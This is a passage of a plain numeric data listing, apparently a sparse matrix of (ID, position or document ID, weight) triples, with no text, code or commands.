(235, 20794, 0.81669),
(233, 20794, 1.63338),
(236, 20794, 1.63338),
(233, 20797, 0.21),
(236, 20797, 0.42),
(168, 20800, 0.21),
(233, 20800, 0.21),
(238, 20800, 0.21),
(247, 20800, 0.21),
(168, 20804, 0.14),
(174, 20804, 0.14),
(233, 20804, 0.14),
(235, 20804, 0.14),
(240, 20804, 0.14),
(246, 20804, 0.14),
(247, 20804, 0.14),
(248, 20804, 0.14),
(253, 20804, 0.14),
(255, 20804, 0.14),
(262, 20804, 0.14),
(263, 20804, 0.14),
(290, 20804, 0.14),
(287, 20804, 0.28),
(239, 20804, 0.34),
(50, 20804, 0.4),
(242, 20804, 0.56),
(193, 20804, 0.74),
(241, 20804, 1.14),
(261, 20804, 1.14),
(168, 20807, 0.14),
(178, 20807, 0.14),
(246, 20807, 0.14),
(254, 20807, 0.14),
(287, 20807, 0.14),
(306, 20807, 0.14),
(236, 20807, 0.28),
(273, 20807, 0.28),
(233, 20807, 0.42),
(262, 20807, 0.42),
(235, 20807, 0.74),
(168, 20814, 0.14),
(233, 20814, 0.14),
(240, 20814, 0.14),
(245, 20814, 0.14),
(263, 20814, 0.14),
(287, 20814, 0.14),
(294, 20814, 0.14),
(238, 20814, 0.28),
(239, 20814, 0.28),
(288, 20814, 0.34),
(178, 20814, 0.42),
(247, 20814, 0.42),
(237, 20814, 0.74),
(267, 20814, 1.14),
(178, 22843, 0.79331),
(299, 22843, 0.79331),
(236, 22845, 0.81669),
(299, 22845, 1.63338),
(168, 22850, 0.14),
(246, 22850, 0.14),
(247, 22850, 0.14),
(287, 22850, 0.14),
(299, 22850, 0.14),
(305, 22850, 0.14),
(178, 22850, 0.28),
(242, 22850, 0.28),
(237, 22850, 0.34),
(238, 22850, 0.56),
(236, 22850, 0.88),
(236, 22853, 0.14),
(239, 22853, 0.14),
(240, 22853, 0.14),
(287, 22853, 0.14),
(294, 22853, 0.14),
(299, 22853, 0.14),
(178, 22853, 0.28),
(244, 22853, 0.28),
(246, 22853, 0.28),
(238, 22853, 0.74),
(236, 22860, 0.14),
(242, 22860, 0.14),
(244, 22860, 0.14),
(253, 22860, 0.14),
(178, 22860, 0.28),
(240, 22860, 0.28),
(299, 22860, 0.28),
(241, 22860, 0.74),
(268, 22860, 1.14),
(44, 25910, 0.2),
(45, 25910, 0.2),
(46, 25910, 0.2),
(47, 25910, 0.2),
(48, 25910, 0.2),
(49, 25910, 0.2),
(50, 25910, 0.2),
(253, 25973, 0.28),
(45, 25973, 0.56),
(288, 25973, 0.68),
(255, 25973, 0.96),
(237, 25973, 1.24),
(254, 25973, 1.8),
(241, 25973, 2.28),
(259, 25973, 2.28),
(260, 25973, 2.28),
(261, 25973, 2.28),
(262, 25973, 2.28),
(263, 25973, 2.28),
(264, 25973, 2.28),
(265, 25973, 2.28),
(266, 25973, 2.28),
(267, 25973, 2.28),
(268, 25973, 2.28),
(269, 25973, 2.28),
(270, 25973, 2.28),
(272, 25973, 2.28),
(273, 25973, 2.28),
(274, 25973, 2.28),
(275, 25973, 2.28),
(280, 25973, 2.28),
(290, 25973, 2.28),
(301, 25973, 2.28),
(257, 25973, 2.56),
(292, 25973, 2.56),
(258, 25973, 3.12),
(256, 25973, 3.68),
(46, 25988, 2.5334),
(46, 25989, 2.6666),
(48, 26018, 2.6),
(48, 26019, 2.7334),
(178, 26049, 0.14),
(193, 26049, 0.14),
(236, 26049, 0.14),
(240, 26049, 0.14),
(263, 26049, 0.14),
(287, 26049, 0.14),
(174, 26049, 0.28),
(245, 26049, 0.28),
(246, 26049, 0.28),
(49, 26049, 0.4),
(253, 26049, 0.74),
(274, 26049, 1.14),
(49, 26050, 2.6),
(49, 26051, 2.7334),
(50, 26064, 2.6),
(50, 26065, 2.7334),
(193, 28129, 0.14),
(253, 28129, 0.14),
(268, 28129, 0.28),
(259, 28129, 0.74),
(178, 31201, 0.14),
(193, 31201, 0.14),
(236, 31201, 0.14),
(244, 31201, 0.14),
(249, 31201, 0.14),
(263, 31201, 0.14),
(174, 31201, 0.28),
(267, 31201, 0.28),
(255, 31201, 0.34),
(240, 31201, 0.74),
(253, 36310, 0.88669),
(238, 36310, 2.66007),
(238, 45520, 0.14),
(242, 45520, 0.14),
(243, 45520, 0.14),
(247, 45520, 0.14),
(248, 45520, 0.14),
(287, 45520, 0.14),
(168, 45520, 0.28),
(174, 45520, 0.28),
(178, 45520, 0.28),
(236, 45520, 0.28),
(246, 45520, 0.28),
(263, 45520, 0.28),
(254, 45520, 0.88),
(292, 45520, 1.14),
(235, 50643, 0.84),
(244, 50643, 0.84),
(262, 50649, 0.84),
(235, 50649, 2.4),
(235, 50651, 0.35),
(236, 50651, 0.35),
(243, 50651, 0.35),
(168, 63938, 0.21),
(193, 63938, 0.21),
(238, 63938, 0.21),
(240, 63938, 0.21),
(242, 63938, 0.21),
(248, 63938, 0.21),
(239, 63938, 0.51),
(168, 63952, 0.14),
(174, 63952, 0.14),
(178, 63952, 0.14),
(193, 63952, 0.14),
(238, 63952, 0.14),
(268, 63952, 0.14),
(292, 63952, 0.14),
(294, 63952, 0.14),
(244, 63952, 0.28),
(246, 63952, 0.28),
(247, 63952, 0.42),
(258, 63952, 0.74),
(259, 63952, 1.14),
(263, 63952, 1.14),
(304, 63952, 1.28),
(168, 63957, 0.14),
(178, 63957, 0.14),
(193, 63957, 0.14),
(238, 63957, 0.14),
(239, 63957, 0.14),
(240, 63957, 0.14),
(273, 63957, 0.14),
(244, 63957, 0.74),
(272, 63957, 1.14),
(237, 68030, 0.34),
(255, 68030, 0.34),
(254, 68030, 1.14),
(256, 68030, 1.14),
(237, 74169, 2.09661),
(254, 74169, 2.09661),
(255, 74169, 2.09661),
(256, 74169, 7.02981),
(236, 77274, 0.81669),
(263, 77274, 0.81669),
(236, 77285, 0.35),
(240, 77285, 0.35),
(236, 77294, 0.35),
(239, 77294, 0.35),
(243, 77294, 0.35),
(246, 77294, 0.35),
(236, 77304, 0.35),
(238, 77304, 0.35),
(236, 77330, 0.81669),
(267, 77330, 0.81669),
(270, 77330, 0.81669),
(301, 77330, 0.81669),
(236, 77334, 0.91),
(269, 77334, 0.91),
(178, 77343, 0.14),
(236, 77343, 0.14),
(244, 77343, 0.14),
(246, 77343, 0.14),
(247, 77343, 0.14),
(238, 77343, 0.28),
(243, 77343, 0.28),
(242, 77343, 0.74),
(168, 77346, 0.14),
(178, 77346, 0.14),
(236, 77346, 0.14),
(244, 77346, 0.14),
(238, 77346, 0.28),
(268, 77346, 0.28),
(243, 77346, 0.74),
(280, 77346, 1.14),
(238, 81381, 0.14),
(239, 81381, 0.14),
(240, 81381, 0.14),
(246, 81381, 0.14),
(264, 81381, 0.14),
(294, 81381, 0.14),
(304, 81381, 0.14),
(168, 81381, 0.28),
(244, 81381, 0.28),
(262, 81381, 0.28),
(255, 81381, 0.74),
(275, 81381, 1.14),
(237, 84403, 0.81669),
(270, 84403, 0.81669),
(301, 84403, 0.81669),
(168, 91573, 0.21),
(238, 91573, 0.21),
(238, 91585, 0.35),
(243, 91585, 0.35),
(247, 91585, 0.35),
(239, 99752, 1.00331),
(242, 99752, 1.00331),
(240, 99761, 0.84),
(242, 99761, 0.84),
(239, 99761, 2.04),
(239, 99764, 0.35),
(240, 99764, 0.35),
(239, 99767, 0.88669),
(240, 99767, 0.88669),
(239, 99777, 0.35),
(240, 99777, 0.35),
(243, 99777, 0.35),
(247, 99777, 0.35),
(239, 99778, 0.91),
(240, 99778, 0.91),
(239, 99779, 1.02669),
(240, 99779, 1.02669),
(239, 99780, 1.00331),
(246, 99780, 1.00331),
(239, 99782, 0.35),
(246, 99782, 0.35),
(239, 99785, 0.88669),
(240, 99785, 0.88669),
(239, 99786, 0.98),
(240, 99786, 0.98),
(265, 109983, 0.8),
(305, 109983, 0.8),
(241, 109983, 1.14),
(257, 109983, 1.14),
(258, 109983, 1.14),
(259, 109983, 1.14),
(264, 109983, 1.14),
(290, 109983, 1.14),
(241, 109984, 7.02981),
(257, 109984, 7.02981),
(258, 109984, 7.02981),
(259, 109984, 7.02981),
(265, 109985, 0.34),
(257, 109985, 1.14),
(260, 109985, 1.14),
(266, 109985, 1.14),
(270, 109985, 1.14),
(272, 109985, 1.14),
(301, 109985, 1.14),
(168, 109990, 0.14),
(174, 109990, 0.14),
(178, 109990, 0.14),
(244, 109990, 0.14),
(246, 109990, 0.14),
(247, 109990, 0.14),
(258, 109990, 0.14),
(265, 109990, 0.34),
(257, 109990, 0.74),
(266, 109990, 1.14),
(174, 114932, 0.14),
(178, 114932, 0.14),
(246, 114932, 0.14),
(263, 114932, 0.14),
(264, 114932, 0.14),
(244, 114932, 0.28),
(256, 114932, 0.74),
(262, 114932, 1.28),
(273, 114946, 0.14),
(178, 114946, 0.42),
(260, 114946, 0.74),
(256, 114946, 1.14),
(242, 168205, 0.21),
(246, 168205, 0.21),
(260, 175411, 1.14),
(261, 175411, 1.14),
(262, 175411, 1.14),
(263, 175411, 1.14),
(260, 175412, 7.02981),
(261, 175412, 7.02981),
(262, 175412, 7.02981),
(263, 175412, 7.02981),
(178, 176465, 0.77),
(244, 176465, 0.77),
(244, 176484, 0.84),
(264, 176484, 0.84),
(178, 176488, 0.84),
(244, 176488, 0.84),
(168, 178514, 0.35),
(245, 178514, 0.35),
(248, 178514, 0.35),
(159, 189269, 2.4),
(159, 189270, 2.7334),
(160, 189284, 2.2666),
(160, 189285, 2.6),
(161, 189299, 0.91),
(161, 189300, 1.05),
(161, 189301, 0.91),
(161, 189302, 1.05),
(161, 189315, 0.88669),
(161, 189316, 1.02669),
(193, 190326, 0.81669),
(267, 190326, 0.81669),
(246, 192372, 0.28),
(249, 192372, 0.68),
(246, 192391, 0.35),
(247, 192391, 0.35),
(168, 192400, 0.35),
(246, 192400, 0.35),
(168, 192420, 0.35),
(246, 192420, 0.35),
(168, 197484, 0.77),
(168, 197485, 0.88669),
(168, 197486, 0.84),
(168, 197487, 0.88669),
(168, 197488, 1.63338),
(168, 197489, 0.86331),
(168, 197490, 0.88669),
(168, 197491, 0.86331),
(168, 197492, 0.95669),
(168, 197493, 0.88669),
(174, 197493, 1.77338),
(247, 197493, 1.77338),
(168, 197494, 0.95669),
(168, 197495, 0.88669),
(168, 197496, 0.93331),
(168, 197497, 0.84),
(168, 197498, 0.91),
(168, 197499, 0.84),
(168, 197500, 0.95669),
(168, 197501, 0.23331),
(168, 197502, 0.86331),
(168, 197503, 1.02669),
(168, 197504, 0.84),
(168, 197505, 0.91),
(168, 197506, 0.21),
(168, 197507, 0.86331),
(168, 197508, 1.02669),
(168, 197509, 0.21),
(168, 197510, 0.81669),
(168, 197511, 1.00331),
(168, 197512, 0.42),
(168, 197513, 0.86331),
(168, 197514, 0.93331),
(168, 197515, 0.91),
(168, 197516, 0.95669),
(168, 197517, 0.81669),
(168, 197518, 0.88669),
(168, 197519, 0.84),
(168, 197520, 0.91),
(168, 197521, 0.91),
(168, 197522, 0.95669),
(168, 197523, 0.81669),
(168, 197524, 0.86331),
(168, 197525, 0.79331),
(168, 197526, 0.88669),
(168, 197527, 0.84),
(168, 197528, 0.88669),
(168, 197529, 0.88669),
(168, 197530, 1.00331),
(168, 197531, 0.81669),
(168, 197532, 0.95669),
(168, 197533, 0.93331),
(168, 197534, 1.05),
(168, 197535, 0.18669),
(248, 197535, 0.18669),
(168, 197536, 0.86331),
(168, 197537, 1.00331),
(168, 197538, 0.79331),
(168, 197539, 0.88669),
(168, 197540, 0.86331),
(168, 197541, 0.93331),
(168, 197542, 0.32669),
(168, 197543, 0.93331),
(168, 197544, 1.07331),
(168, 197545, 0.79331),
(168, 197546, 0.93331),
(168, 197547, 0.88669),
(168, 197548, 1.00331),
(168, 197549, 0.88669),
(168, 197550, 0.98),
(168, 197551, 0.93331),
(168, 197552, 1.00331),
(168, 197553, 0.88669),
(168, 197554, 0.98),
(168, 197555, 0.35),
(168, 197556, 0.91),
(168, 197557, 0.98),
(168, 197558, 0.23331),
(168, 197559, 0.88669),
(168, 197560, 0.95669),
(174, 214886, 1.86662),
(247, 214886, 1.86662),
(174, 214887, 0.28),
(174, 214888, 0.93331),
(174, 214889, 1.02669),
(174, 214890, 0.81669),
(174, 214891, 0.93331),
(174, 214892, 0.81669),
(174, 214893, 0.88669),
(174, 214894, 0.86331),
(174, 214895, 0.98),
(174, 214896, 1.72662),
(174, 214897, 1.05),
(174, 214898, 0.98),
(174, 214899, 1.58662),
(174, 214900, 0.98),
(174, 214901, 0.91),
(174, 214902, 0.84),
(174, 214903, 0.98),
(174, 214904, 0.91),
(174, 214905, 0.98),
(174, 214906, 0.93331),
(174, 214907, 1.00331),
(174, 214908, 0.86331),
(174, 214909, 0.95669),
(174, 214910, 0.84),
(174, 214911, 0.95669),
(178, 221037, 0.91),
(178, 221038, 0.91),
(178, 221039, 1.00331),
(178, 221040, 0.77),
(178, 221041, 0.88669),
(178, 221042, 0.79331),
(178, 221043, 0.91),
(178, 221044, 0.79331),
(178, 221045, 0.86331),
(178, 221046, 0.91),
(178, 221047, 0.84),
(178, 221048, 0.95669),
(178, 221049, 0.88669),
(178, 221050, 0.95669),
(178, 221051, 0.21),
(178, 221052, 0.81669),
(178, 221053, 0.91),
(178, 221054, 0.37331),
(178, 221055, 0.98),
(178, 221056, 1.09669),
(178, 221057, 0.93331),
(178, 221058, 1.05),
(178, 221059, 0.86331),
(178, 221060, 0.98),
(178, 221061, 0.35),
(178, 221062, 0.88669),
(178, 221063, 1.00331),
(178, 221064, 0.21),
(178, 221065, 0.91),
(178, 221066, 0.98),
(178, 221067, 0.81669),
(178, 221068, 0.93331),
(178, 221069, 0.86331),
(178, 221070, 0.98),
(178, 221071, 0.84),
(178, 221072, 1.07331),
(178, 221073, 0.79331),
(178, 221074, 0.88669),
(178, 221075, 0.91),
(178, 221076, 1.02669),
(178, 221077, 0.88669),
(178, 221078, 0.98),
(178, 221079, 0.84),
(178, 221080, 0.91),
(178, 221081, 0.86331),
(178, 221082, 1.07331),
(178, 221083, 0.32669),
(178, 221084, 0.93331),
(178, 221085, 1.05),
(178, 221086, 0.14),
(178, 221087, 0.88669),
(178, 221088, 0.95669),
(178, 221089, 0.28),
(178, 221090, 0.88669),
(178, 221091, 1.05),
(178, 221092, 0.32669),
(178, 221093, 0.95669),
(178, 221094, 1.16669),
(178, 221095, 0.46669),
(178, 221096, 1.05),
(178, 221097, 1.16669),
(178, 221098, 0.79331),
(178, 221099, 0.86331),
(178, 221100, 0.81669),
(178, 221101, 0.86331),
(178, 221102, 0.81669),
(178, 221103, 0.91),
(178, 221104, 0.35),
(178, 221105, 0.88669),
(178, 221106, 0.95669),
(178, 221107, 0.84),
(178, 221108, 0.95669),
(178, 221109, 0.95669),
(178, 221110, 0.81669),
(178, 221111, 0.98),
(178, 221112, 0.86331),
(178, 221113, 0.93331),
(178, 221114, 0.86331),
(178, 221115, 0.98),
(178, 221116, 0.81669),
(178, 221117, 0.93331),
(178, 221118, 0.91),
(178, 221119, 1.05),
(178, 221120, 0.14),
(178, 221121, 0.88669),
(178, 221122, 0.98),
(178, 221123, 0.88669),
(178, 221124, 0.95669),
(178, 221125, 0.81669),
(178, 221126, 0.88669),
(178, 221127, 1.58662),
(178, 221128, 0.86331),
(178, 221129, 1.00331),
(178, 221130, 0.09331),
(178, 221131, 0.81669),
(178, 221132, 0.91),
(178, 221206, 0.86331),
(178, 221207, 1.00331),
(178, 221208, 0.86331),
(178, 221209, 0.98),
(178, 221210, 0.84),
(178, 221211, 0.95669),
(264, 226204, 0.77),
(247, 226204, 1.54),
(248, 228209, 0.81669),
(264, 228209, 0.81669),
(247, 228703, 0.81669),
(249, 228703, 1.98339),
(247, 228749, 0.32669),
(248, 228749, 0.32669),
(247, 228752, 0.23331),
(249, 228752, 0.23331),
(247, 228771, 0.21),
(249, 228771, 0.51),
(265, 231772, 4.6668),
(264, 231772, 6.65019),
(265, 231773, 5.3332),
(264, 231773, 7.59981),
(265, 231774, 0.8),
(264, 231774, 1.14),
(267, 231774, 1.14),
(268, 231774, 1.14),
(269, 231774, 1.14),
(273, 231774, 1.14),
(265, 231775, 4.9332),
(264, 231775, 7.02981),
(267, 231775, 7.02981),
(268, 231775, 7.02981),
(269, 231775, 7.02981),
(193, 238075, 0.88669),
(193, 238076, 1.00331),
(193, 238077, 1.00331),
(193, 238078, 1.07331),
(193, 238079, 1.09669),
(193, 238080, 0.93331),
(193, 238081, 1.02669),
(193, 238082, 0.81669),
(193, 238083, 1.05),
(193, 238084, 2.7334),
(193, 238085, 0.81669),
(193, 238086, 0.86331),
(193, 238087, 1.02669),
(193, 238088, 1.09669),
(193, 238089, 0.84),
(193, 238090, 1.07331),
(193, 238091, 0.81669),
(193, 238092, 0.88669),
(193, 238093, 0.79331),
(193, 238094, 0.86331),
(193, 238116, 0.79331),
(193, 238117, 0.88669),
(193, 238118, 0.88669),
(193, 238119, 1.00331),
(265, 250352, 2.09661),
(266, 250352, 7.02981),
(270, 250352, 7.02981),
(272, 250352, 7.02981),
(301, 250352, 7.02981),
(270, 250353, 0.93331),
(301, 250353, 0.93331),
(270, 250354, 0.93331),
(301, 250354, 0.93331),
(265, 250919, 0.81669),
(266, 250919, 0.81669),
(265, 250920, 0.88669),
(266, 250920, 0.88669),
(265, 250921, 1.98339),
(266, 250921, 6.65019),
(265, 250922, 2.26661),
(266, 250922, 7.59981),
(273, 256048, 6.65019),
(273, 256049, 7.59981),
(273, 256050, 1.14),
(274, 256050, 1.14),
(275, 256050, 1.14),
(280, 256050, 1.14),
(273, 256051, 7.02981),
(274, 256051, 7.02981),
(275, 256051, 7.02981),
(280, 256051, 7.02981),
(273, 256052, 0.79331),
(273, 256053, 0.86331),
(273, 256054, 0.77),
(273, 256055, 0.91),
(273, 256056, 0.81669),
(273, 256057, 0.88669),
(273, 256058, 0.81669),
(273, 256059, 0.91),
(273, 256060, 0.77),
(273, 256061, 0.88669),
(273, 256062, 1.63338),
(273, 256063, 0.86331),
(273, 256064, 0.86331),
(273, 256065, 0.81669),
(273, 256066, 1.00331),
(273, 256067, 0.93331),
(273, 256068, 1.05),
(287, 264279, 0.81669),
(299, 264279, 0.81669),
(233, 266316, 0.88669),
(233, 266317, 0.86331),
(233, 266318, 0.84),
(233, 266319, 0.98),
(233, 266320, 0.88669),
(233, 266321, 0.93331),
(233, 266322, 0.88669),
(233, 266323, 0.81669),
(233, 266324, 0.93331),
(233, 266325, 0.81669),
(233, 266326, 0.98),
(233, 266327, 0.98),
(233, 266328, 1.07331),
(233, 266329, 0.86331),
(233, 266330, 0.93331),
(233, 266331, 0.91),
(233, 266332, 0.95669),
(233, 266333, 0.84),
(233, 266334, 0.95669),
(233, 266335, 0.84),
(233, 266336, 0.95669),
(233, 266337, 0.81669),
(233, 266338, 0.88669),
(233, 266339, 0.79331),
(233, 266340, 1.02669),
(233, 266341, 0.79331),
(233, 266342, 1.00331),
(233, 266343, 0.77),
(233, 266344, 0.84),
(233, 266345, 0.21),
(233, 266346, 0.88669),
(233, 266347, 0.93331),
(235, 267341, 0.79331),
(235, 267342, 0.86331),
(235, 267343, 0.86331),
(235, 267344, 1.00331),
(235, 267345, 0.81669),
(235, 267346, 0.93331),
(235, 267347, 0.84),
(235, 267348, 0.95669),
(235, 267349, 0.86331),
(235, 267350, 0.88669),
(235, 267351, 0.81669),
(235, 267352, 0.91),
(235, 267353, 0.81669),
(235, 267354, 0.95669),
(235, 267355, 2.7334),
(235, 267356, 0.95669),
(235, 267357, 1.00331),
(235, 267358, 0.35),
(235, 267359, 0.91),
(235, 267360, 1.05),
(235, 267361, 0.23331),
(235, 267362, 0.86331),
(235, 267363, 0.91),
(235, 267380, 0.86331),
(235, 267381, 0.95669),
(236, 268361, 0.81669),
(236, 268362, 0.86331),
(236, 268363, 0.88669),
(236, 268364, 0.86331),
(236, 268365, 0.95669),
(236, 268366, 1.02669),
(236, 268367, 0.88669),
(236, 268368, 1.00331),
(236, 268369, 0.95669),
(236, 268370, 1.12),
(236, 268371, 0.86331),
(236, 268372, 0.91),
(236, 268373, 0.86331),
(236, 268374, 0.91),
(236, 268375, 1.05),
(236, 268376, 1.09669),
(236, 268377, 0.86331),
(236, 268378, 0.86331),
(236, 268379, 0.91),
(236, 268380, 0.88669),
(236, 268381, 0.93331),
(236, 268382, 1.07331),
(236, 268383, 1.33),
(236, 268384, 0.21),
(236, 268385, 0.95669),
(236, 268386, 1.02669),
(236, 268387, 0.86331),
(290, 268387, 0.86331),
(236, 268388, 0.98),
(236, 268389, 0.84),
(236, 268390, 1.05),
(236, 268391, 0.35),
(236, 268392, 0.86331),
(236, 268393, 1.00331),
(236, 268394, 0.35),
(236, 268395, 0.93331),
(236, 268396, 1.00331),
(236, 268397, 0.86331),
(236, 268398, 0.84),
(236, 268399, 0.88669),
(236, 268400, 0.35),
(236, 268401, 0.86331),
(236, 268402, 0.93331),
(236, 268403, 0.84),
(236, 268404, 1.02669),
(236, 268405, 0.88669),
(236, 268406, 1.02669),
(236, 268407, 0.95669),
(236, 268408, 1.09669),
(236, 268409, 0.35),
(236, 268410, 0.86331),
(236, 268411, 1.00331),
(236, 268412, 0.88669),
(236, 268413, 0.93331),
(236, 268414, 2.6666),
(236, 268415, 0.93331),
(236, 268416, 0.98),
(236, 268417, 0.35),
(236, 268418, 0.86331),
(236, 268419, 1.00331),
(236, 268420, 0.86331),
(236, 268421, 0.93331),
(236, 268422, 1.00331),
(236, 268423, 1.07331),
(236, 268424, 0.91),
(236, 268425, 1.02669),
(236, 268426, 0.28),
(236, 268427, 0.98),
(236, 268428, 1.02669),
(236, 268429, 0.23331),
(236, 268430, 0.86331),
(236, 268431, 0.95669),
(236, 268432, 0.77),
(236, 268433, 0.86331),
(236, 268434, 0.79331),
(236, 268435, 0.88669),
(236, 268436, 0.86331),
(236, 268437, 1.00331),
(236, 268438, 0.86331),
(236, 268439, 0.91),
(236, 268440, 0.81669),
(236, 268441, 0.95669),
(236, 268442, 1.54),
(236, 268443, 0.81669),
(236, 268444, 1.07331),
(236, 268445, 0.86331),
(236, 268446, 0.91),
(236, 268447, 0.91),
(236, 268448, 0.95669),
(236, 268449, 1.14331),
(236, 268450, 0.86331),
(236, 268451, 0.91),
(236, 268452, 0.95669),
(236, 268453, 0.35),
(236, 268454, 0.86331),
(236, 268455, 0.95669),
(236, 268456, 0.79331),
(236, 268457, 0.98),
(236, 268458, 0.79331),
(236, 268459, 0.88669),
(236, 268460, 0.88669),
(236, 268461, 1.07331),
(236, 268462, 0.88669),
(236, 268463, 1.00331),
(236, 268464, 0.35),
(236, 268465, 0.88669),
(236, 268466, 1.02669),
(236, 268467, 0.18669),
(236, 268468, 0.84),
(236, 268469, 0.88669),
(236, 268502, 0.79331),
(236, 268503, 0.91),
(237, 269384, 0.95669),
(237, 269385, 1.98339),
(237, 269386, 2.26661),
(237, 269387, 2.6),
(237, 269388, 2.7334),
(237, 269389, 0.84),
(237, 269390, 0.88669),
(237, 269391, 0.84),
(237, 269392, 0.93331),
(237, 269393, 0.93331),
(237, 269394, 1.05),
(238, 270407, 0.86331),
(238, 270408, 0.91),
(238, 270409, 1.72662),
(238, 270410, 0.91),
(238, 270411, 0.91),
(238, 270412, 0.91),
(238, 270413, 1.02669),
(238, 270414, 1.02669),
(238, 270415, 1.12),
(238, 270416, 0.86331),
(238, 270417, 1.02669),
(238, 270418, 0.81669),
(238, 270419, 0.98),
(238, 270420, 0.81669),
(238, 270421, 0.93331),
(238, 270422, 0.86331),
(238, 270423, 0.95669),
(238, 270424, 0.35),
(238, 270425, 1.00331),
(238, 270426, 1.07331),
(238, 270427, 0.91),
(238, 270428, 1.09669),
(238, 270429, 0.84),
(238, 270430, 0.95669),
(238, 270431, 0.7),
(238, 270432, 0.98),
(238, 270433, 1.14331),
(238, 270434, 0.91),
(238, 270435, 1.02669),
(238, 270436, 0.84),
(238, 270437, 1.09669),
(238, 270438, 0.84),
(238, 270439, 0.88669),
(238, 270440, 0.84),
(238, 270441, 0.95669),
(238, 270442, 0.79331),
(238, 270443, 0.86331),
(238, 270444, 0.88669),
(238, 270445, 0.98),
(238, 270446, 0.93331),
(238, 270447, 1.00331),
(238, 270448, 0.35),
(238, 270449, 0.93331),
(238, 270450, 0.98),
(238, 270451, 2.7334),
(238, 270452, 2.9334),
(238, 270453, 1.00331),
(238, 270454, 1.14331),
(238, 270455, 0.46669),
(238, 270456, 1.07331),
(238, 270457, 1.16669),
(238, 270458, 0.37331),
(238, 270459, 0.98),
(238, 270460, 1.07331),
(238, 270461, 0.79331),
(238, 270462, 0.93331),
(238, 270463, 0.88669),
(238, 270464, 1.00331),
(238, 270465, 0.86331),
(238, 270466, 1.16669),
(238, 270467, 1.02669),
(238, 270468, 1.12),
(238, 270469, 0.95669),
(238, 270470, 0.95669),
(238, 270471, 0.93331),
(238, 270472, 0.35),
(238, 270473, 0.93331),
(238, 270474, 1.07331),
(238, 270475, 0.79331),
(238, 270476, 0.91),
(238, 270477, 0.88669),
(238, 270478, 1.00331),
(238, 270479, 1.77338),
(238, 270480, 1.05),
(238, 270481, 0.98),
(238, 270482, 0.95669),
(238, 270483, 1.05),
(238, 270484, 0.81669),
(238, 270485, 0.86331),
(238, 270521, 0.86331),
(238, 270522, 1.05),
(238, 270523, 0.79331),
(238, 270524, 0.98),
(239, 272454, 1.07331),
(239, 272455, 2.15339),
(239, 272456, 2.32339),
(239, 272457, 0.88669),
(239, 272458, 0.98),
(239, 272459, 0.35),
(239, 272460, 0.91),
(239, 272461, 1.00331),
(239, 272462, 1.02669),
(239, 272463, 1.33),
(239, 272464, 0.88669),
(239, 272465, 1.14331),
(239, 272466, 0.95669),
(239, 272467, 0.88669),
(239, 272468, 0.95669),
(239, 272469, 0.86331),
(239, 272470, 1.00331),
(239, 272471, 0.84),
(239, 272472, 0.98),
(239, 272473, 2.6666),
(239, 272474, 3.3334),
(239, 272475, 1.05),
(239, 272476, 1.02669),
(239, 272477, 1.09669),
(239, 272483, 0.86331),
(239, 272484, 1.07331),
(240, 274504, 0.88669),
(240, 274505, 1.00331),
(240, 274506, 0.23331),
(240, 274507, 0.91),
(240, 274508, 0.98),
(240, 274509, 0.81669),
(240, 274510, 0.86331),
(240, 274511, 0.35),
(240, 274512, 0.88669),
(240, 274513, 0.98),
(240, 274514, 0.79331),
(240, 274515, 0.95669),
(240, 274516, 0.95669),
(240, 274517, 0.88669),
(240, 274518, 0.98),
(240, 274519, 0.93331),
(240, 274520, 1.07331),
(240, 274521, 1.00331),
(240, 274522, 0.79331),
(240, 274523, 0.93331),
(240, 274524, 0.81669),
(240, 274525, 0.98),
(240, 274526, 0.77),
(240, 274527, 0.88669),
(240, 274528, 0.23331),
(240, 274529, 0.91),
(240, 274530, 0.98),
(240, 274531, 2.6666),
(240, 274532, 0.81669),
(240, 274533, 0.98),
(240, 274534, 0.91),
(240, 274535, 1.05),
(241, 276548, 6.65019),
(241, 276549, 7.59981),
(241, 276550, 0.86331),
(241, 276551, 0.93331),
(241, 276552, 2.4666),
(241, 276553, 2.7334),
(242, 277571, 1.07331),
(242, 277572, 0.86331),
(242, 277573, 0.98),
(242, 277574, 0.21),
(242, 277575, 0.84),
(242, 277576, 0.88669),
(242, 277577, 0.88669),
(242, 277578, 1.02669),
(242, 277579, 0.79331),
(242, 277580, 1.07331),
(242, 277581, 0.93331),
(242, 277582, 0.79331),
(242, 277583, 0.91),
(242, 277584, 0.88669),
(242, 277585, 0.98),
(242, 277586, 0.84),
(242, 277587, 0.91),
(242, 277588, 0.81669),
(242, 277589, 0.86331),
(242, 277590, 0.84),
(242, 277591, 0.95669),
(242, 277592, 0.79331),
(242, 277593, 1.07331),
(242, 277594, 2.6666),
(242, 277595, 3.3334),
(242, 277618, 0.81669),
(242, 277619, 0.88669),
(242, 277620, 0.91),
(242, 277621, 0.95669),
(243, 281666, 0.84),
(243, 281667, 1.05),
(243, 281668, 0.91),
(243, 281669, 1.16669),
(243, 281670, 0.88669),
(243, 281671, 1.00331),
(243, 281672, 0.35),
(243, 281673, 0.91),
(243, 281674, 1.07331),
(243, 281675, 0.93331),
(243, 281676, 1.00331),
(243, 281677, 0.35),
(243, 281678, 0.88669),
(243, 281679, 1.02669),
(243, 281680, 0.35),
(243, 281681, 0.86331),
(243, 281682, 0.98),
(243, 281683, 0.86331),
(243, 281684, 0.98),
(243, 281685, 0.93331),
(243, 281686, 1.05),
(243, 281687, 0.86331),
(243, 281688, 0.91),
(243, 281689, 0.86331),
(243, 281690, 0.95669),
(243, 281691, 0.86331),
(243, 281692, 1.02669),
(243, 281693, 0.84),
(243, 281694, 0.98),
(243, 281695, 0.81669),
(243, 281696, 0.95669),
(243, 281697, 2.4),
(243, 281698, 3),
(243, 281730, 0.91),
(243, 281731, 0.98),
(244, 283713, 0.84),
(244, 283714, 0.88669),
(244, 283715, 0.88669),
(244, 283716, 0.95669),
(244, 283717, 0.88669),
(244, 283718, 1.07331),
(244, 283719, 0.84),
(244, 283720, 0.93331),
(244, 283721, 0.84),
(244, 283722, 0.98),
(244, 283723, 0.84),
(244, 283724, 0.93331),
(244, 283725, 0.91),
(244, 283726, 1.00331),
(244, 283727, 0.91),
(244, 283728, 0.98),
(244, 283729, 0.81669),
(244, 283730, 0.93331),
(244, 283731, 0.91),
(244, 283732, 0.86331),
(244, 283733, 0.95669),
(244, 283734, 0.98),
(244, 283735, 0.84),
(244, 283736, 0.91),
(244, 283737, 0.84),
(244, 283738, 0.93331),
(244, 283739, 0.81669),
(244, 283740, 0.91),
(244, 283741, 0.86331),
(244, 283742, 0.95669),
(244, 283743, 0.86331),
(244, 283744, 0.95669),
(244, 283745, 2.8),
(244, 283747, 0.79331),
(244, 283748, 0.93331),
(245, 284736, 0.91),
